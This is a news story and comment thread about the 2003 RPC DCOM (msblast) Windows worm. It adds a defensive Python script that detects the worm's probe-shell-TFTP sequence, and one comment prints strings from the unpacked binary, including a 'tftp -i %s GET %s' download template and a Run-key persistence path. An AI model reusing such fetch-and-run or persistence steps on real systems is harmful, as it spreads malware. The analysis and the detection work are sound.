RPC DCOM Worm On The Loose
GPez writes "The first of I'm sure many RPC DCOM worms affecting Windows is on its way, according to the Internet Storm Center. Patch those systems!" According to the site, "The worm uses the RPC DCOM vulnerability [affects Win2k through Server 2003] to propagate. Once it finds a vulnerable system, it will spawn a shell on port 4444 and use it to download the actual worm via tftp."
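The propagation sequence from the summary above (RPC probe, shell on port 4444, TFTP download), as an added detection example that is not part of the original story or any comment. It correlates constructed flow records and assumes the RPC probe arrives on TCP 135, the TFTP request goes from the newly infected host back to the infecting host on UDP 69, and all three steps fall within 60 seconds; the function names and log layout are hypothetical.

```python
from datetime import datetime, timedelta

# Constructed flow records: time, source, destination, protocol, destination port.
# Addresses are documentation-range placeholders, not data from the story.
SAMPLE_FLOWS = """\
2000-01-01T19:02:10 192.0.2.10 198.51.100.5 tcp 135
2000-01-01T19:02:11 192.0.2.10 198.51.100.5 tcp 4444
2000-01-01T19:02:13 198.51.100.5 192.0.2.10 udp 69
2000-01-01T19:03:00 192.0.2.10 198.51.100.6 tcp 135
2000-01-01T19:03:40 203.0.113.7 198.51.100.8 tcp 4444
2000-01-01T19:04:00 198.51.100.9 192.0.2.10 udp 69
2000-01-01T19:05:00 192.0.2.10 198.51.100.7 tcp 135
2000-01-01T19:05:01 192.0.2.10 198.51.100.7 tcp 4444
2000-01-01T19:09:30 198.51.100.7 192.0.2.10 udp 69
"""

# Assumed ports: RPC probe, remote shell, then the TFTP fetch back to the scanner.
STEPS = [("tcp", 135), ("tcp", 4444), ("udp", 69)]

def parse(text):
    for line in text.splitlines():
        if line.strip():
            ts, src, dst, proto, port = line.split()
            yield datetime.fromisoformat(ts), src, dst, proto, int(port)

def find_infections(text, window=timedelta(seconds=60)):
    """Return (scanner, victim, time) for each pair completing all three steps."""
    progress = {}  # (scanner, victim) -> (steps matched, time of first step)
    hits = []
    for ts, src, dst, proto, port in sorted(parse(text)):
        flow = (proto, port)
        # Steps 1-2 run scanner -> victim; the TFTP step runs victim -> scanner.
        pair = (dst, src) if flow == STEPS[2] else (src, dst)
        stage, started = progress.get(pair, (0, ts))
        if ts - started > window:
            stage = 0                      # partial match went stale
        if flow == STEPS[stage]:
            stage += 1
        elif flow == STEPS[0]:
            stage = 1                      # a fresh probe restarts the sequence
        else:
            continue                       # lone 4444 or TFTP flow: not a match
        if stage == 1:
            started = ts
        if stage == len(STEPS):
            hits.append((pair[0], pair[1], ts))
            progress.pop(pair, None)
        else:
            progress[pair] = (stage, started)
    return hits
```

Requiring all three steps between the same pair of hosts keeps a lone connection to port 4444 or an unrelated TFTP transfer from raising an alert.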
Great (Score:5, Funny)
Will blocking port 135 at the router stop this worm? Seems like a simple solution for the short term. I would like to see the source for the worm, does anybody have it?
Re:Great (Score:5, Funny)
I have already patched my entire network. (Score:4, Funny)
Ballmer (Score:2, Funny)
erm...
security security security... erm
um...
somebody get me more cocaine!
New title suggestion for this story (Score:4, Funny)
Shouldn't that be:
Developers, Developers, Developers, Developers, Developers, Developers, Developers, Developers, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!, DEVELOPERS!: RPC DCOM Worm On The Loose
Re:Great (Score:3, Funny)
An error occured while loading http://212.192.128.76:4444:
Could not connect to host 212.192.128.76 (port 4444)
I saw it happen LIVE! (Score:5, Funny)
Anyhow, I had just finished that when XP said it was shutting down in 30 seconds. I was like, WTF!
Here I am thinking that I just screwed up their machine with the new apps somehow.
Thanks a bunch, Billy. Guess they'll be punting this one to Longhorn
Re:Great (Score:4, Funny)
Open all your ports and I'll see what I can do!
go ME! (Score:5, Funny)
* Microsoft Windows NT(R) 4.0
* Microsoft Windows NT 4.0 Terminal Services Edition
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server(TM) 2003
Not Affected Software:
* Microsoft Windows Millennium Edition
finally! all these years of running Win ME have paid off! so long suckers!
OMG (Score:5, Funny)
Protection from the virus (Score:3, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Effects (Score:3, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Ballmer (Score:2, Funny)
Re:I have already patched my entire network. (Score:5, Funny)
Re:Credit... (Score:3, Funny)
From your local neighbourhood fortune cookie file.
-Dom
I'm safe (Score:5, Funny)
You did say this was a RPG worm, right?
Re:go ME! (Score:5, Funny)
Sucks big fat sweaty donkey balls:
* Microsoft Windows Millennium Edition
WINE? (Score:2, Funny)
Thanks.
Port Scan your computer/net (Score:2, Funny)
Re:Credit... (Score:5, Funny)
Is that what they were taking when they wrote the code?
Yawn.... (Score:3, Funny)
Symantec (Score:2, Funny)
Other changes needed (Score:1, Funny)
http://www.microsoft.com/com/tech/DCOM.asp
I got this one... (Score:1, Funny)
The worm, aptly named msblast.exe and happily sitting in my system32 folder, sending itself to a bunch of random addresses (that happened to be in a reserved netblock and were timing out, go figure), was packed with UPX. After uncompressing and running strings on it, here are some interesting finds:
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Fun, hah? Way to go you bloody wanker, you made my day. I hope SAN (your right hand) loves you too.
Re:go ME! (Score:2, Funny)
Re:users being hit hard (Score:5, Funny)
Re:On the way? (Score:3, Funny)
Liar, liar, pants never on fire (Score:2, Funny)
It's heeeerrreeee... (Score:2, Funny)
*sigh*
I'm not sure about removing it.... (Score:5, Funny)
Re:I have already patched my entire network. (Score:1, Funny)